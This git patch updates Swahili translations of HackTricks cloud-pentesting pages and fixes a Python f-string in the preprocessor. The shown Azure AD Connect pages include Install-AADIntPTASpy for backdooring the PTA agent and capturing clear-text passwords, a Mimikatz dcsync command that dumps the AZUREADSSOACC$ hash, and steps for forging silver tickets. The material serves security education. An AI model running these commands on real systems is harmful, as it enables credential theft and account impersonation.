From 5a62f6b0a3eb1277b951e5feb1ea7bb52ea8fc63 Mon Sep 17 00:00:00 2001 From: Translator Date: Thu, 2 Jan 2025 00:00:35 +0000 Subject: [PATCH] Translated ['.github/pull_request_template.md', 'src/README.md', 'src/pe --- .github/pull_request_template.md | 6 +- .gitignore | 2 - book.toml | 2 +- hacktricks-preprocessor.py | 4 +- src/SUMMARY.md | 2 - .../README.md | 14 +- .../pta-pass-through-authentication.md | 30 ++-- .../seamless-sso.md | 44 ++--- .../azure-security/az-persistence/README.md | 14 +- .../az-persistence/az-queue-persistance.md | 6 +- .../az-persistence/az-storage-persistence.md | 8 +- .../az-persistence/az-vms-persistence.md | 2 +- .../az-blob-storage-post-exploitation.md | 4 +- .../az-file-share-post-exploitation.md | 4 +- .../az-function-apps-post-exploitation.md | 2 +- .../az-key-vault-post-exploitation.md | 6 +- .../az-queue-post-exploitation.md | 14 +- .../az-servicebus-post-exploitation.md | 16 +- .../az-sql-post-exploitation.md | 6 +- .../az-table-storage-post-exploitation.md | 6 +- .../az-vms-and-network-post-exploitation.md | 48 +++--- .../az-privilege-escalation/README.md | 2 +- .../az-app-services-privesc.md | 2 +- .../az-authorization-privesc.md | 6 +- .../az-entraid-privesc/README.md | 36 ++-- ...-conditional-access-policies-mfa-bypass.md | 58 +++---- .../az-entraid-privesc/dynamic-groups.md | 10 +- .../az-functions-app-privesc.md | 74 ++++---- .../az-key-vault-privesc.md | 2 +- .../az-queue-privesc.md | 10 +- .../az-servicebus-privesc.md | 8 +- .../az-privilege-escalation/az-sql-privesc.md | 18 +- .../az-storage-privesc.md | 30 ++-- ...az-virtual-machines-and-network-privesc.md | 18 +- .../azure-security/az-services/README.md | 2 +- .../azure-security/az-services/az-acr.md | 2 +- .../az-services/az-app-service.md | 23 ++- .../az-services/az-application-proxy.md | 4 +- .../az-services/az-arm-templates.md | 4 +- .../az-automation-account/README.md | 52 +++--- .../az-state-configuration-rce.md | 14 +- .../azure-security/az-services/az-azuread.md | 60 +++---- .../az-services/az-file-shares.md | 22 +-- .../az-services/az-function-apps.md | 46 ++--- .../az-services/az-logic-apps.md | 10 +- ...roups-subscriptions-and-resource-groups.md | 2 +- .../az-services/az-queue-enum.md | 6 +- .../az-services/az-servicebus-enum.md | 20 +-- .../azure-security/az-services/az-sql.md | 58 +++---- .../azure-security/az-services/az-storage.md | 120 ++++++------- .../az-services/az-table-storage.md | 10 +- .../azure-security/az-services/intune.md | 8 +- .../azure-security/az-services/keyvault.md | 24 +-- .../azure-security/az-services/vms/README.md | 78 ++++----- .../az-services/vms/az-azure-network.md | 66 ++++---- .../README.md | 62 +++---- .../az-oauth-apps-phishing.md | 40 ++--- .../az-password-spraying.md | 4 +- .../az-vms-unath.md | 6 +- .../digital-ocean-pentesting/README.md | 2 +- .../do-basic-information.md | 42 ++--- .../do-permissions-for-a-pentest.md | 4 +- .../do-services/README.md | 2 +- .../do-services/do-apps.md | 4 +- .../do-services/do-container-registry.md | 2 +- .../do-services/do-databases.md | 2 +- .../do-services/do-droplets.md | 12 +- .../do-services/do-functions.md | 10 +- .../do-services/do-images.md | 2 +- .../do-services/do-kubernetes-doks.md | 12 +- .../do-services/do-networking.md | 4 +- .../do-services/do-projects.md | 10 +- .../do-services/do-spaces.md | 4 +- .../do-services/do-volumes.md | 2 +- src/pentesting-cloud/gcp-security/README.md | 26 +-- .../gcp-basic-information/README.md | 106 ++++++------ .../gcp-federation-abuse.md | 8 +- .../gcp-permissions-for-a-pentest.md | 12 +- .../gcp-app-engine-persistence.md | 4 +- .../gcp-artifact-registry-persistence.md | 22 +-- .../gcp-cloud-functions-persistence.md | 2 +- .../gcp-cloud-shell-persistence.md | 12 +- .../gcp-cloud-sql-persistence.md | 2 +- .../gcp-compute-persistence.md | 4 +- .../gcp-dataflow-persistence.md | 8 +- .../gcp-filestore-persistence.md | 2 +- .../gcp-non-svc-persistance.md | 20 +-- .../gcp-secret-manager-persistence.md | 6 +- .../gcp-storage-persistence.md | 10 +- .../gcp-post-exploitation/README.md | 2 +- .../gcp-app-engine-post-exploitation.md | 12 +- ...gcp-artifact-registry-post-exploitation.md | 8 +- .../gcp-cloud-functions-post-exploitation.md | 9 +- .../gcp-cloud-run-post-exploitation.md | 2 +- .../gcp-cloud-shell-post-exploitation.md | 14 +- .../gcp-cloud-sql-post-exploitation.md | 16 +- .../gcp-compute-post-exploitation.md | 36 ++-- .../gcp-filestore-post-exploitation.md | 8 +- .../gcp-iam-post-exploitation.md | 8 +- .../gcp-kms-post-exploitation.md | 4 +- .../gcp-logging-post-exploitation.md | 2 +- .../gcp-monitoring-post-exploitation.md | 4 +- .../gcp-pub-sub-post-exploitation.md | 10 +- .../gcp-secretmanager-post-exploitation.md | 2 +- .../gcp-security-post-exploitation.md | 6 +- .../gcp-storage-post-exploitation.md | 2 +- .../gcp-privilege-escalation/README.md | 28 ++-- .../gcp-apikeys-privesc.md | 24 +-- .../gcp-appengine-privesc.md | 16 +- .../gcp-artifact-registry-privesc.md | 24 +-- .../gcp-bigquery-privesc.md | 10 +- .../gcp-clientauthconfig-privesc.md | 2 +- .../gcp-cloudbuild-privesc.md | 8 +- .../gcp-cloudfunctions-privesc.md | 32 ++-- .../gcp-cloudidentity-privesc.md | 2 +- .../gcp-cloudscheduler-privesc.md | 4 +- .../gcp-composer-privesc.md | 24 +-- .../gcp-compute-privesc/README.md | 28 ++-- .../gcp-add-custom-ssh-metadata.md | 16 +- .../gcp-container-privesc.md | 26 +-- .../gcp-deploymentmaneger-privesc.md | 6 +- .../gcp-iam-privesc.md | 50 +++--- .../gcp-kms-privesc.md | 12 +- ...local-privilege-escalation-ssh-pivoting.md | 24 +-- .../gcp-misc-perms-privesc.md | 2 +- .../gcp-network-docker-escape.md | 14 +- .../gcp-orgpolicy-privesc.md | 6 +- .../gcp-pubsub-privesc.md | 4 +- .../gcp-resourcemanager-privesc.md | 6 +- .../gcp-run-privesc.md | 10 +- .../gcp-secretmanager-privesc.md | 4 +- .../gcp-serviceusage-privesc.md | 14 +- .../gcp-sourcerepos-privesc.md | 18 +- .../gcp-storage-privesc.md | 38 ++--- .../gcp-workflows-privesc.md | 14 +- .../gcp-services/gcp-ai-platform-enum.md | 2 +- .../gcp-services/gcp-api-keys-enum.md | 2 +- .../gcp-services/gcp-app-engine-enum.md | 12 +- .../gcp-artifact-registry-enum.md | 24 +-- .../gcp-services/gcp-batch-enum.md | 2 +- .../gcp-services/gcp-bigquery-enum.md | 44 ++--- .../gcp-services/gcp-bigtable-enum.md | 2 +- .../gcp-services/gcp-cloud-build-enum.md | 22 +-- .../gcp-services/gcp-cloud-functions-enum.md | 4 +- .../gcp-services/gcp-cloud-run-enum.md | 16 +- .../gcp-services/gcp-cloud-scheduler-enum.md | 10 +- .../gcp-services/gcp-cloud-shell-enum.md | 4 +- .../gcp-services/gcp-cloud-sql-enum.md | 12 +- .../gcp-services/gcp-composer-enum.md | 2 +- .../gcp-compute-instances-enum/README.md | 52 +++--- .../gcp-compute-instance.md | 34 ++-- .../gcp-vpc-and-networking.md | 20 +-- .../gcp-containers-gke-and-composer-enum.md | 30 ++-- .../gcp-security/gcp-services/gcp-dns-enum.md | 2 +- .../gcp-services/gcp-filestore-enum.md | 28 ++-- .../gcp-services/gcp-firebase-enum.md | 22 +-- .../gcp-services/gcp-firestore-enum.md | 2 +- .../gcp-iam-and-org-policies-enum.md | 36 ++-- .../gcp-security/gcp-services/gcp-kms-enum.md | 30 ++-- .../gcp-services/gcp-logging-enum.md | 38 ++--- .../gcp-services/gcp-memorystore-enum.md | 2 +- .../gcp-services/gcp-monitoring-enum.md | 8 +- .../gcp-security/gcp-services/gcp-pub-sub.md | 20 +-- .../gcp-services/gcp-secrets-manager-enum.md | 6 +- .../gcp-services/gcp-security-enum.md | 38 ++--- .../gcp-source-repositories-enum.md | 18 +- .../gcp-services/gcp-stackdriver-enum.md | 4 +- .../gcp-services/gcp-storage-enum.md | 24 +-- .../gcp-services/gcp-workflows-enum.md | 4 +- .../gcp-to-workspace-pivoting/README.md | 74 ++++---- ...cp-understanding-domain-wide-delegation.md | 20 +-- .../README.md | 2 +- .../gcp-api-keys-unauthenticated-enum.md | 6 +- .../gcp-app-engine-unauthenticated-enum.md | 2 +- ...-artifact-registry-unauthenticated-enum.md | 2 +- .../gcp-cloud-build-unauthenticated-enum.md | 10 +- ...cp-cloud-functions-unauthenticated-enum.md | 2 +- .../gcp-cloud-run-unauthenticated-enum.md | 2 +- .../gcp-cloud-sql-unauthenticated-enum.md | 2 +- .../gcp-compute-unauthenticated-enum.md | 4 +- ...principals-and-org-unauthenticated-enum.md | 14 +- ...ource-repositories-unauthenticated-enum.md | 8 +- .../README.md | 2 +- ...gcp-public-buckets-privilege-escalation.md | 20 +-- .../ibm-cloud-pentesting/README.md | 20 +-- .../ibm-basic-information.md | 10 +- .../ibm-hyper-protect-crypto-services.md | 8 +- .../ibm-hyper-protect-virtual-server.md | 20 +-- .../kubernetes-security/README.md | 16 +- .../README.md | 158 +++++++++--------- .../kubernetes-roles-abuse-lab.md | 20 +-- .../pod-escape-privileges.md | 2 +- .../attacking-kubernetes-from-inside-a-pod.md | 98 +++++------ .../exposing-services-in-kubernetes.md | 30 ++-- .../kubernetes-security/kubernetes-basics.md | 130 +++++++------- .../kubernetes-enumeration.md | 56 +++---- .../kubernetes-external-secrets-operator.md | 14 +- .../kubernetes-hardening/README.md | 40 ++--- .../kubernetes-securitycontext-s.md | 50 +++--- .../kubernetes-kyverno/README.md | 4 +- .../kubernetes-kyverno-bypass.md | 12 +- .../kubernetes-namespace-escalation.md | 10 +- .../kubernetes-network-attacks.md | 32 ++-- .../kubernetes-opa-gatekeeper/README.md | 10 +- .../kubernetes-opa-gatekeeper-bypass.md | 10 +- .../kubernetes-pivoting-to-clouds.md | 54 +++--- ...bernetes-role-based-access-control-rbac.md | 14 +- ...bernetes-validatingwebhookconfiguration.md | 18 +- .../pentesting-kubernetes-services/README.md | 80 ++++----- ...ubelet-authentication-and-authorization.md | 28 ++-- .../openshift-basic-information.md | 8 +- .../openshift-jenkins/README.md | 14 +- .../openshift-jenkins-build-overrides.md | 47 +++--- .../openshift-privilege-escalation/README.md | 4 +- .../openshift-missing-service-account.md | 10 +- .../openshift-scc-bypass.md | 16 +- .../openshift-tekton.md | 18 +- .../openshift-pentesting/openshift-scc.md | 20 +-- .../workspace-security/README.md | 6 +- .../gws-google-platforms-phishing/README.md | 62 +++---- .../gws-app-scripts.md | 50 +++--- .../workspace-security/gws-persistence.md | 52 +++--- .../gws-post-exploitation.md | 8 +- .../README.md | 16 +- .../gcds-google-cloud-directory-sync.md | 20 +-- ...-google-credential-provider-for-windows.md | 66 ++++---- .../gps-google-password-sync.md | 38 ++--- .../gws-admin-directory-sync.md | 40 ++--- theme/index.hbs | 1 - 229 files changed, 2195 insertions(+), 2217 deletions(-) diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md index bda755898..be51755ed 100644 --- a/.github/pull_request_template.md +++ b/.github/pull_request_template.md @@ -1,11 +1,9 @@ -You can remove this content before sending the PR: - ## Attribution Tunathamini maarifa yako na kukuhimiza kushiriki maudhui. Tafadhali hakikisha unachapisha tu maudhui ambayo unamiliki au ambayo una ruhusa ya kuyashiriki kutoka kwa mwandishi wa asili (kuongeza rejea kwa mwandishi katika maandiko yaliyoongezwa au mwishoni mwa ukurasa unaobadilisha au vyote viwili). Heshima yako kwa haki za mali ya akili inakuza mazingira ya kushiriki ambayo ni ya kuaminika na kisheria kwa kila mtu. ## HackTricks Training -Ikiwa unongeza ili uweze kupita katika mtihani wa [ARTE certification](https://training.hacktricks.xyz/courses/arte) na bendera 2 badala ya 3, unahitaji kuita PR `arte-`. +Ikiwa unongeza ili uweze kupita katika mtihani wa [ARTE certification](https://training.hacktricks.xyz/courses/arte) kwa bendera 2 badala ya 3, unahitaji kuita PR `arte-`. -Pia, kumbuka kwamba marekebisho ya sarufi/sintaksia hayatakubaliwa kwa kupunguza bendera za mtihani. +Pia, kumbuka kwamba marekebisho ya sarufi/sintaksis hayatakubaliwa kwa kupunguza bendera za mtihani. Katika hali yoyote, asante kwa kuchangia katika HackTricks! diff --git a/.gitignore b/.gitignore index 7fa947732..8d12fbb76 100644 --- a/.gitignore +++ b/.gitignore @@ -3,8 +3,6 @@ - - # General .DS_Store .AppleDouble diff --git a/book.toml b/book.toml index 4add3bde9..e3330d5e6 100644 --- a/book.toml +++ b/book.toml @@ -1,5 +1,5 @@ [book] -authors = ["Carlos Polop"] +authors = ["HackTricks Team"] language = "en" multilingual = false src = "src" diff --git a/hacktricks-preprocessor.py b/hacktricks-preprocessor.py index 56a0cf0dc..37f549101 100644 --- a/hacktricks-preprocessor.py +++ b/hacktricks-preprocessor.py @@ -43,14 +43,14 @@ def ref(matchobj): if href.endswith("/"): href = href+"README.md" # Fix if ref points to a folder chapter, _path = findtitle(href, book, "source_path") - logger.debug(f'Recursive title search result: {chapter['name']}') + logger.debug(f'Recursive title search result: {chapter["name"]}') title = chapter['name'] except Exception as e: try: dir = path.dirname(current_chapter['source_path']) logger.debug(f'Error getting chapter title: {href} trying with relative path {path.normpath(path.join(dir,href))}') chapter, _path = findtitle(path.normpath(path.join(dir,href)), book, "source_path") - logger.debug(f'Recursive title search result: {chapter['name']}') + logger.debug(f'Recursive title search result: {chapter["name"]}') title = chapter['name'] except Exception as e: logger.debug(f'Error getting chapter title: {path.normpath(path.join(dir,href))}') diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 1b1d60c58..feae5163c 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -505,5 +505,3 @@ - - diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md index 86526d5b2..78b6d62f8 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md @@ -4,18 +4,18 @@ ## Basic Information -Integration between **On-premises Active Directory (AD)** and **Azure AD** is facilitated by **Azure AD Connect**, offering various methods that support **Single Sign-on (SSO)**. Each method, while useful, presents potential security vulnerabilities that could be exploited to compromise cloud or on-premises environments: +Ushirikiano kati ya **On-premises Active Directory (AD)** na **Azure AD** unarahisishwa na **Azure AD Connect**, ukitoa mbinu mbalimbali zinazosaidia **Single Sign-on (SSO)**. Kila mbinu, ingawa ni muhimu, ina hatari za usalama zinazoweza kutumiwa kuathiri mazingira ya wingu au ya ndani: - **Pass-Through Authentication (PTA)**: -- Uwezekano wa kuathiriwa kwa wakala kwenye AD ya ndani, kuruhusu uthibitishaji wa nywila za watumiaji kwa ajili ya muunganisho wa Azure (kutoka ndani hadi Cloud). -- Uwezekano wa kujiandikisha wakala mpya ili kuthibitisha uthibitisho katika eneo jipya (Cloud hadi ndani). +- Uwezekano wa kuathiriwa kwa wakala kwenye AD ya ndani, kuruhusu uthibitishaji wa nywila za watumiaji kwa ajili ya muunganisho wa Azure (kutoka ndani hadi Wingu). +- Uwezekano wa kujiandikisha wakala mpya ili kuthibitisha uthibitisho katika eneo jipya (kutoka Wingu hadi ndani). {{#ref}} pta-pass-through-authentication.md {{#endref}} - **Password Hash Sync (PHS)**: -- Uwezekano wa kutoa nywila za wazi za watumiaji wenye mamlaka kutoka AD, ikiwa ni pamoja na akauti za mtumiaji wa AzureAD zenye mamlaka ya juu, zilizoundwa kiotomatiki. +- Uwezekano wa kutoa nywila za wazi za watumiaji wenye mamlaka kutoka AD, ikiwa ni pamoja na akidi za mtumiaji wa AzureAD aliyejengwa kwa mamlaka ya juu. {{#ref}} phs-password-hash-sync.md @@ -36,7 +36,7 @@ seamless-sso.md {{#endref}} - **Cloud Kerberos Trust**: -- Uwezekano wa kupandisha cheo kutoka kwa Global Admin hadi kwa Domain Admin wa ndani kwa kubadilisha majina ya watumiaji wa AzureAD na SIDs na kuomba TGTs kutoka AzureAD. +- Uwezekano wa kupandisha kutoka kwa Global Admin hadi kwa Domain Admin wa ndani kwa kubadilisha majina ya watumiaji wa AzureAD na SIDs na kuomba TGTs kutoka AzureAD. {{#ref}} az-cloud-kerberos-trust.md @@ -49,9 +49,9 @@ az-cloud-kerberos-trust.md az-default-applications.md {{#endref}} -For each integration method, user synchronization is conducted, and an `MSOL_` account is created in the on-prem AD. Notably, both **PHS** and **PTA** methods facilitate **Seamless SSO**, enabling automatic sign-in for Azure AD computers joined to the on-prem domain. +Kwa kila mbinu ya ushirikiano, usawazishaji wa watumiaji unafanywa, na akaunti ya `MSOL_` inaundwa katika AD ya ndani. Kwa kuzingatia, mbinu zote mbili **PHS** na **PTA** zinasaidia **Seamless SSO**, kuruhusu kuingia kiotomatiki kwa kompyuta za Azure AD zilizounganishwa na eneo la ndani. -To verify the installation of **Azure AD Connect**, the following PowerShell command, utilizing the **AzureADConnectHealthSync** module (installed by default with Azure AD Connect), can be used: +Ili kuthibitisha usakinishaji wa **Azure AD Connect**, amri ifuatayo ya PowerShell, ikitumia moduli ya **AzureADConnectHealthSync** (iliyowekwa kwa chaguo-msingi na Azure AD Connect), inaweza kutumika: ```powershell Get-ADSyncConnector ``` diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md index dbda7c4ba..c36b39d9d 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.md @@ -6,7 +6,7 @@ [From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-pta) Azure Active Directory (Azure AD) Pass-through Authentication inaruhusu watumiaji wako **kuingia kwenye programu za ndani na za wingu wakitumia nywila sawa**. Kipengele hiki kinawapa watumiaji wako uzoefu bora - nywila moja kidogo ya kukumbuka, na hupunguza gharama za msaada wa IT kwa sababu watumiaji wako wana uwezekano mdogo wa kusahau jinsi ya kuingia. Wakati watumiaji wanaingia wakitumia Azure AD, kipengele hiki **kinathibitisha nywila za watumiaji moja kwa moja dhidi ya Active Directory yako ya ndani**. -Katika PTA **vitambulisho** vinakuwa **vimeunganishwa** lakini **nywila** **hazijashirikiwa** kama katika PHS. +Katika PTA **identities** zinahusishwa lakini **nywila** **hazihusishwi** kama katika PHS. Uthibitishaji unathibitishwa katika AD ya ndani na mawasiliano na wingu yanafanywa na **wakala wa uthibitishaji** anayekimbia katika **seva ya ndani** (haipaswi kuwa kwenye DC ya ndani). @@ -14,51 +14,51 @@ Uthibitishaji unathibitishwa katika AD ya ndani na mawasiliano na wingu yanafany
-1. Ili **kuingia** mtumiaji anapelekwa kwa **Azure AD**, ambapo anatumia **jina la mtumiaji** na **nywila** -2. **Taarifa za kuingia** zinakuwa **zimefichwa** na kuwekwa kwenye **foleni** katika Azure AD -3. **Wakala wa uthibitishaji wa ndani** anakusanya **taarifa za kuingia** kutoka kwenye foleni na **kuzifichua**. Wakala huyu anaitwa **"Wakala wa uthibitishaji wa kupita"** au **wakala wa PTA.** +1. Ili **kuingia** mtumiaji anapelekwa kwenye **Azure AD**, ambapo anatumia **jina la mtumiaji** na **nywila** +2. **Taarifa za kuingia** zinahifadhiwa **kwa siri** na kuwekwa kwenye **foleni** katika Azure AD +3. **Wakala wa uthibitishaji wa ndani** anakusanya **taarifa za kuingia** kutoka kwenye foleni na **kuzifungua**. Wakala huyu anaitwa **"Pass-through authentication agent"** au **PTA agent.** 4. **Wakala** **anathibitisha** taarifa dhidi ya **AD ya ndani** na anatumia **jibu** **kurudi** kwa Azure AD ambayo, ikiwa jibu ni chanya, **inakamilisha kuingia** kwa mtumiaji. > [!WARNING] -> Ikiwa mshambuliaji **anavunja** **PTA** anaweza **kuona** taarifa zote **za kuingia** kutoka kwenye foleni (katika **maandishi wazi**).\ +> Ikiwa mshambuliaji **anashambulia** **PTA** anaweza **kuona** taarifa zote **za kuingia** kutoka kwenye foleni (katika **maandishi wazi**).\ > Anaweza pia **kuhakiki taarifa zozote** kwa AzureAD (shambulio linalofanana na ufunguo wa Skeleton). ### On-Prem -> cloud -Ikiwa una **ufikiaji wa admin** kwa **seva ya Azure AD Connect** yenye **wakala wa PTA** akifanya kazi, unaweza kutumia moduli ya **AADInternals** **kuingiza nyuma** ambayo it **ihakiki NYWILA ZOTE** zilizowekwa (hivyo nywila zote zitakuwa halali kwa uthibitishaji): +Ikiwa una **ufikiaji wa admin** kwa **seva ya Azure AD Connect** yenye **wakala wa PTA** akifanya kazi, unaweza kutumia moduli ya **AADInternals** ku **ingiza nyuma ya mlango** ambayo it **athibitisha NYWILA ZOTE** zilizowekwa (hivyo nywila zote zitakuwa halali kwa uthibitishaji): ```powershell Install-AADIntPTASpy ``` > [!NOTE] > Ikiwa **ufungaji unashindwa**, hii inaweza kuwa kutokana na kukosekana kwa [Microsoft Visual C++ 2015 Redistributables](https://download.microsoft.com/download/6/A/A/6AA4EDFF-645B-48C5-81CC-ED5963AEAD48/vc_redist.x64.exe). -Pia inawezekana **kuona nywila za wazi zinazotumwa kwa wakala wa PTA** kwa kutumia cmdlet ifuatayo kwenye mashine ambapo nyuma ya mlango wa awali ilipowekwa: +Pia inawezekana **kuona nywila za maandiko wazi zinazotumwa kwa wakala wa PTA** kwa kutumia cmdlet ifuatayo kwenye mashine ambapo nyuma ya mlango wa awali ilifungwa: ```powershell Get-AADIntPTASpyLog -DecodePasswords ``` -This backdoor will: +Hii backdoor itafanya: -- Create a hidden folder `C:\PTASpy` -- Copy a `PTASpy.dll` to `C:\PTASpy` -- Injects `PTASpy.dll` to `AzureADConnectAuthenticationAgentService` process +- Kuunda folda ya siri `C:\PTASpy` +- Nakala ya `PTASpy.dll` kwenye `C:\PTASpy` +- Inajumuisha `PTASpy.dll` kwenye mchakato wa `AzureADConnectAuthenticationAgentService` > [!NOTE] -> When the AzureADConnectAuthenticationAgent service is restarted, PTASpy is “unloaded” and must be re-installed. +> Wakati huduma ya AzureADConnectAuthenticationAgent inapoanzishwa upya, PTASpy "imeondolewa" na inapaswa kusanikishwa tena. ### Cloud -> On-Prem > [!CAUTION] -> After getting **GA privileges** on the cloud, it's possible to **register a new PTA agent** by setting it on an **attacker controlled machine**. Once the agent is **setup**, we can **repeat** the **previous** steps to **authenticate using any password** and also, **get the passwords in clear-text.** +> Baada ya kupata **GA privileges** kwenye wingu, inawezekana **kujiandikisha wakala mpya wa PTA** kwa kuweka kwenye **kifaa kinachodhibitiwa na mshambuliaji**. Mara wakala anapokuwa **amewekwa**, tunaweza **kurudia** hatua **za awali** ili **kujiandikisha kwa kutumia nenosiri lolote** na pia, **kupata nenosiri kwa maandiko wazi.** ### Seamless SSO -It's possible to use Seamless SSO with PTA, which is vulnerable to other abuses. Check it in: +Inawezekana kutumia Seamless SSO na PTA, ambayo ina hatari ya matumizi mengine. Angalia katika: {{#ref}} seamless-sso.md {{#endref}} -## References +## Marejeleo - [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-pta) - [https://aadinternals.com/post/on-prem_admin/#pass-through-authentication](https://aadinternals.com/post/on-prem_admin/#pass-through-authentication) diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md index 69844c55d..05e577a14 100644 --- a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.md @@ -4,23 +4,23 @@ ## Basic Information -[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sso) Azure Active Directory Seamless Single Sign-On (Azure AD Seamless SSO) moja kwa moja **inaingia watumiaji wanapokuwa kwenye vifaa vyao vya kampuni** vilivyounganishwa na mtandao wa kampuni yako. Wakati imewezeshwa, **watumiaji hawahitaji kuandika nywila zao ili kuingia kwenye Azure AD**, na kwa kawaida, hata kuandika majina yao ya mtumiaji. Kipengele hiki kinawapa watumiaji wako ufikiaji rahisi wa programu zako za msingi wa wingu bila kuhitaji vipengele vyovyote vya ziada vya kwenye tovuti. +[From the docs:](https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sso) Azure Active Directory Seamless Single Sign-On (Azure AD Seamless SSO) moja kwa moja **inaingia watumiaji wanapokuwa kwenye vifaa vyao vya kampuni** vilivyounganishwa na mtandao wa kampuni yako. Wakati imewezeshwa, **watumiaji hawahitaji kuandika nywila zao kuingia kwenye Azure AD**, na kawaida, hata kuandika majina yao ya mtumiaji. Kipengele hiki kinawapa watumiaji wako ufikiaji rahisi wa programu zako za msingi wa wingu bila kuhitaji vipengele vyovyote vya ziada vya kwenye tovuti.

https://learn.microsoft.com/en-us/entra/identity/hybrid/connect/how-to-connect-sso-how-it-works

-Kimsingi Azure AD Seamless SSO **inaingia watumiaji** wanapokuwa **katika PC iliyounganishwa kwenye eneo la ndani**. +Kimsingi Azure AD Seamless SSO **inaingia watumiaji** wanapokuwa **katika PC iliyounganishwa kwenye kikoa la ndani**. Inasaidiwa na [**PHS (Password Hash Sync)**](phs-password-hash-sync.md) na [**PTA (Pass-through Authentication)**](pta-pass-through-authentication.md). -Desktop SSO inatumia **Kerberos** kwa ajili ya uthibitishaji. Wakati imewekwa, Azure AD Connect inaunda **akaunti ya kompyuta inayoitwa AZUREADSSOACC`$`** katika AD ya ndani. Nywila ya akaunti ya `AZUREADSSOACC$` **inatumwa kama maandiko wazi kwa Azure AD** wakati wa usanidi. +Desktop SSO inatumia **Kerberos** kwa uthibitishaji. Wakati imewekwa, Azure AD Connect inaunda **akaunti ya kompyuta inayoitwa AZUREADSSOACC`$`** katika AD ya ndani. Nywila ya akaunti ya `AZUREADSSOACC$` **inatumwa kama maandiko wazi kwa Azure AD** wakati wa usanidi. **Tiketi za Kerberos** **zimefungwa** kwa kutumia **NTHash (MD4)** ya nywila na Azure AD inatumia nywila iliyotumwa kufungua tiketi hizo. -**Azure AD** inatoa **kiungo** (https://autologon.microsoftazuread-sso.com) ambacho kinakubali **tiketi** za Kerberos. Kivinjari cha mashine iliyounganishwa kwenye eneo la ndani kinapeleka tiketi hizi kwa kiungo hiki kwa ajili ya SSO. +**Azure AD** inatoa **kiungo** (https://autologon.microsoftazuread-sso.com) ambacho kinakubali **tiketi** za Kerberos. Kivinjari cha mashine iliyounganishwa kwenye kikoa kinapeleka tiketi hizi kwa kiungo hiki kwa SSO. ### On-prem -> cloud -**Nywila** ya mtumiaji **`AZUREADSSOACC$` haitabadilika kamwe**. Hivyo, msimamizi wa eneo anaweza kuathiri **hash ya akaunti hii**, na kisha kuitumia **kuunda tiketi za fedha** kuungana na Azure na **mtumiaji yeyote wa ndani aliyeunganishwa**: +**Nywila** ya mtumiaji **`AZUREADSSOACC$` haitabadilika kamwe**. Hivyo, msimamizi wa kikoa anaweza kuathiri **hash ya akaunti hii**, na kisha kuitumia **kuunda tiketi za fedha** kuungana na Azure na **mtumiaji yeyote wa ndani aliyeunganishwa**: ```powershell # Dump hash using mimikatz Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\azureadssoacc$ /domain:domain.local /dc:dc.domain.local"' @@ -55,15 +55,15 @@ Send-AADIntOutlookMessage -AccessToken $at -Recipient "someone@company.com" -Sub ``` Ili kutumia tiketi ya fedha, hatua zifuatazo zinapaswa kutekelezwa: -1. **Anzisha Kivinjari:** Mozilla Firefox inapaswa kuzinduliwa. -2. **Sanidi Kivinjari:** +1. **Anzisha kivinjari:** Mozilla Firefox inapaswa kuzinduliwa. +2. **Sanidi kivinjari:** - Tembelea **`about:config`**. -- Weka upendeleo wa [network.negotiate-auth.trusted-uris](https://github.com/mozilla/policy-templates/blob/master/README.md#authentication) kwa [thamani](https://docs.microsoft.com/en-us/azure/active-directory/connect/active-directory-aadconnect-sso#ensuring-clients-sign-in-automatically) zilizotajwa: +- Weka upendeleo wa [network.negotiate-auth.trusted-uris](https://github.com/mozilla/policy-templates/blob/master/README.md#authentication) kwa [thamani zilizotajwa](https://docs.microsoft.com/en-us/azure/active-directory/connect/active-directory-aadconnect-sso#ensuring-clients-sign-in-automatically): - `https://aadg.windows.net.nsatc.net` - `https://autologon.microsoftazuread-sso.com` -3. **Fikia Programu ya Mtandao:** -- Tembelea programu ya mtandao ambayo imeunganishwa na eneo la AAD la shirika. Mfano maarufu ni [Office 365](https://portal.office.com/). -4. **Mchakato wa Uthibitishaji:** +3. **Fikia programu ya wavuti:** +- Tembelea programu ya wavuti ambayo imeunganishwa na eneo la AAD la shirika. Mfano wa kawaida ni [Office 365](https://portal.office.com/). +4. **Mchakato wa uthibitishaji:** - Katika skrini ya kuingia, jina la mtumiaji linapaswa kuingizwa, huku uwanja wa nywila ukiwa tupu. - Ili kuendelea, bonyeza TAB au ENTER. @@ -75,35 +75,35 @@ Ili kutumia tiketi ya fedha, hatua zifuatazo zinapaswa kutekelezwa: Pia inawezekana kufanya shambulio hili **bila shambulio la dcsync** ili kuwa na siri zaidi kama 